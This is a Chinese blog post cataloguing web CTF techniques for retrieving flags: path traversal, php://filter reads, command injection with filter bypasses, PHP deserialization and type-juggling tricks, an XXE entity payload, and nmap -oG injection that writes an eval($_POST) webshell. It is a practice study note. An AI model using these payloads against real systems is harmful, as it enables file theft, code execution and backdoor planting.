第1-63题总结:URL提交参数获取flag篇

最新推荐文章于 2024-05-15 09:16:34 发布
最新推荐文章于 2024-05-15 09:16:34 发布
阅读量3.7k 收藏 13
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/116587543
版权

第一种:使用目录穿越方法,提交参数时输入:xxxx?/…/…/…/…/flag,利用?/将xxx文件失效,解析到flag所在文档,eg:第一题

第二种:使用filter协议读取文件,语句:php://filter/read=convert.base64-encode/resource=flag.php

php://filter可以在resource之前嵌套一层目录,利用此原理获取flag
输入php://filter/convert.base64-encode/index/resource=flag,得到base64编码,解码后得到flag

第三种:执行ping命令时,使用|或;执行除ping命令外我们想要执行的命令

空格替换:采用$IPS$1代替空格
关键字替换,cat /flag=a=g;cat$IFS$1fla$a

第四种:利用空格绕过WAF,利用print_r(scandir(chr(47)))获取根目录下文件,利用print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))获取flag,eg:第十三题

第五种:判断流量包

  1. 指明原跳转页面,添加Referer一栏指明https://www.Sycsecret.com
  2. 指明浏览器:修改User-Agent一栏为:Syclover
  3. X-Forwarded-For:127.0.0.1来指定请求方的IP

第六种:使用dirsearch扫描目录

  1. www.zip
  2. index.php.bak
  3. 存在/.git目录,利用GitHack
  4. phpmyadmin
  5. index.php.swp

第七种:反序列化漏洞

 protected:声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀
对于private变量,我们需要在类名和字段名前面都会加上\0的前缀
如果想放在浏览器中直接提交,我们可以将\0换成%00
  1. weakup函数会在反序列化时执行,绕过方法,修改序列化字符串中成员数量,将正确的:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}修改为错误的:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
  2. extract($_POST);通过POST提交重名的_SESSION对象,可以覆盖掉之前的_SEEION对象值

第八种:类型绕过

  1. 弱等绕过,php的==会将数字加字符串类型强制转换为数字,舍去字符后面的全部内容
  2. 数字长度绕过,利用数组
  3. 值不同,md5值相同,利用数组进行绕过a[]=1&b[]=2,或者
  4. intval函数会将输入的字符串转化为int型数字,若输入的有数字有字符,则将字符前的数字转化为int,字符后的数字舍去。但是当我们以科学计数法输入不会识别成科学计数法,会当成数字+字符组合,但对科学i计数法进行加减法,再使用intval提取时会得到正确结果,所以输入3e3,intval(3e3)=3,intval(3e3+1)=3001
  5. cat替换为wctf2020,我们可以使用tac,若里面有空格,则strstr函数会识别出来,可以采用$IFS$9代替空格
$md5=$_GET['md5'];
  if ($md5==md5($md5))

md5=0e215962017

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

第九种:session绕过,eg:第二十题

第十种:利用data协议绕过file_get_contents函数,data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=,eg:第二十四题

第十一种:nmap绕过,eg:第三十三题

1、

nmap有个参数-oG可以使扫描结果保存为指定名字的文件。
构建host=' <?php echo 'cat /flag'?> -oG 1.php '之后访问1.php就可以获取flag了echo后面不是单引号,单引号会被加上\,是~键的反引号,单引号内的内容需要空格和单引号隔开。
或者构建host=' <?php @eval($_POST["pass"]);?> -oG 1.php '上传一句话木马,之后通过蚁剑连接后查找flag。

2、

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

蚁剑连接hack.phtml

第十二种:preg_replace函数绕过,eg:第四十题

构造参数:\S*=${getFlag()}

第十三种:XML

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY XXE SYSTEM "file:///文件名" >]>
<name>&XXE;</name>

第十四种:UTF-8绕过,eg:第四十六题

想学习安全的小白
关注
  • 0
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
github-action-issue-commenter::rainbow_flag: GitHub行动评论问
04-16
评论者 GitHub Action提供有关... 带有操作参数的可选JSON数据源文件: [ { " commentOptions " : { " message " : " Commenting on pull request # 10 " }, " resourceOptions " : { " requestId " : 10
【漏洞扫描】
IC0903的博客
04-22 722
漏洞扫描 CTF 一、简介: CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。 二、竞赛: CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团
CTF训练笔记(五)- 一些获取FLAG的方法总结(待续)
热门推荐
morrino的博客
04-21 2万+
- 注意开放了未知服务的端口,可以使用nc工具获取对应的Banner信息; - 当命令疑似被过滤时,尝试使用相近的shell命令绕开过滤,如‘cat’换成‘more’; - 不放过任何可利用服务和细节,哪怕可能会做无用功; [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
2024年最新CTF利用大佬们的webshell拿取flag_ctf留言板获取flag(1),Golang系统面试
最新发布
2401_84924864的博客
05-15 450
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问。的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。但唯一发现了一个zb.php无疑是个webshell。本来想把图片下载下来,看看一些大佬上传的图片马密码。需要的话可以点击**
2020Xpoint新生杯(部分writeup)
weixin_46938584的博客
11-11 1287
真签到 扫二维码回复信息得到flag。 假的签到 1、提示robots.txt。 2、又提示进入phpp_tql.php,得到如下源码。 <?php highlight_file(__FILE__); $phpp=$_GET['phpp']; $hphh=$_GET['hphh']; if (md5($phpp)===md5($hphh) and $phpp!==$hphh ){ highlight_file('flag.php'); }else{ echo 'PHP 彳亍'."
获取flag
qq_49091880的博客
01-02 1万+
获取FLAG值 一、SSH服务器 1.如何从外部进入最终root主机,获得flag值 SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
CTFshow Web入门 part.1信息搜集
qq_61758260的博客
12-19 1282
1.Web1 描述:开发注释未及时删除 直接查看源码就可以得到flag 2.Web2 描述:js前台拦截 === 无效操作 可在开发者工具栏查看到flag 3.Web3 描述:没思路的时候抓个包看看,可能会有意外收获 可使用bp也可在开发者工具栏查看: ...
vue-country-flag:国旗的Vue组件
05-01
vue-country-flag 国家标记作为Vue组件 Vue 3支持 从2.0.3版开始,此组件同时支持Vue2和Vue3。 为了将其与Vue 3配合使用,请按如下所示安装vue-country-flag-next软件包: npm install vue-country-flag-next Vue...
final-form-focus::chequered_flag:最终表单“装饰器”,它将在尝试提交表单时尝试将焦点应用于第一个字段,但会出现错误
05-11
:chequered_flag: 最终形式重点 :face_with_monocle: 装饰器 ,它将尝试将焦点应用于第一个字段,但在尝试提交表单时会出错。 关注错误示例原料药createDecorator: (getInputs?: GetInputs, findInput?: FindInput) ...
lrucacheleetcode-thinking-in-algorithm:flag:7天入门数据结构与算法
06-29
反馈(总结/运用) 数据结构 一维数据结构 基础:数组array,链表linked list 高级:栈stack,队列queue,双端队列deque,集合set,映射map(hash or map) 二维数据结构 基础:树tree,图graph 高级:二叉搜索树...
react-native-fast-image::triangular_flag:FastImage,高性能React Native图像组件
02-05
:triangular_flag: 快速图像Performant React Native图像组件。 FastImage示例应用程序。 React Native的Image组件在大多数情况下像浏览器一样处理图像缓存。 如果服务器为图像返回正确的缓存控制标头,则通常会获得...
CTF_Web长征路细刷笔记
Mark的博客
01-06 4334
文件包含一、2018 XCTF FINALS —— babyphp二、 一、2018 XCTF FINALS —— babyphp 0x01信息收集 打开环境可以看到几个关键点,首先便是看到有两个可控变量 1: $_GET[‘function’] 执行函数 2: $_POST[‘name’] 可控制session值内容 其次又看到include($file);存在文件包含,ini_set限定了文件包含目录 最后可见call_user_func($func,$_GET)这个函
2022淮安市第十七届职业学校技能大赛网络安全解WP
明裕学长的博客
11-04 2568
没要求版本号,只要求端口号,可以用-sS,要全面再加上-p-nmap-p--sSFlag[22;111;6000]2、将服务器中tmp文件夹下的字典下载至本地,并将字典中最后一位用户名作为flag提交;3、应用工具获取服务器中黑客账户的密码。并将黑客的密码作为flag提交;4、在服务器中查看sudo软件的版本,将sudo的版本号作为flag提交;5、在服务器中登录恶意用户,查看恶意用户在服务器中输入的第一条指令,将指令作为flag提交;先对恶意用户进行爆破。
文件和MD5的提取和赛要求的flag提交方式
轻舟已过万重山
10-06 627
大家好,本章节我将会模拟做一下赛中文件的MD5值提取或计算的相关赛,对这方面感兴趣的大佬们可以私信一起交流,一起学习。赛考察的是对md5值的工具的使用。
11月11号考核
weixin_74328163的博客
11-19 381
直接给它换个方式打开,撇到浏览器里面,右键点个全选都有一串蓝色的。复制粘贴到别的地方就ok了。就可以得到flag了。可以得到提瓦特大陆密码,可以一个一个对照就可以翻译出flag。无非让我们去修改这个图片的高度从而得到flag。图片闪动截图flag,拼手速。图片提取文字就可以得到flag了。利用ctrl+f键文本搜索flag形式。就可以直接得到flag。这个图片上都注释了我可以假装看不见。下载完文件直接将其扔到010里面。将文本放入其中可以直接得到flag。可以直接领悟熊说的话。直接浏览器搜索熊曰。
js中获取modelandview中的数据_简单的CTF-从JS中获取flag
weixin_35625309的博客
01-22 435
本文是一从合天网安实验室进行实验操作的笔记,一次非常简单地从JS中获取到flag的操作。实验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016092313300000001&pk_campaign=toutiao-wemedia1. 进入目页(10.1.1.219:20123)看到一段...
BugKu-Web
龙卷风摧毁停车场
04-07 525
Simple_SSTI_1 SSTI的意思是模板注入 服务端模板注入 flask注入的三种模板 {% … %} {{ … }} {# … #} 打开网页查看源代码,提示说要传入一个名为flag参数,下面的意思是,你只,在flask,经常会设置secret_key,查了一下,这个注入的模板就是{{}}最里面的括号里面些什么就会显示什么,像传入一个flag参数,?flag={{3*3}}就会显示9,那都提示了说在secret_key里面直接把这个东西放里面看看怎么事儿呗?flag={{secret_key
php反序列化
n1ght的博客
11-30 746
php反序列化,和php的session反序列化,php原生类
Go命令传参模块flag使用方法-自定义程序名称
坐公交也用券
11-20 299
Go命令传参模块flag使用方法并实现自定义程序名称
protoc-gen-go: no such flag -plugin --go_out: protoc-gen-go: Plugin failed with status code 1.
09-25
在运行 `protoc` 命令时,出现了错误 `protoc-gen-go: no such flag -plugin` 和 `protoc-gen-go: Plugin failed with status code 1`。这是因为在新版本的 Protocol Buffers 中,不再需要使用 `-plugin` 参数来指定插件。正确的用法是将 `--go_out` 参数与插件路径一起使用,例如 `--go_out=./plugin_path`。在您的命令中,您可以将插件路径替换为实际的路径,例如 `--go_out=./my_plugin`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值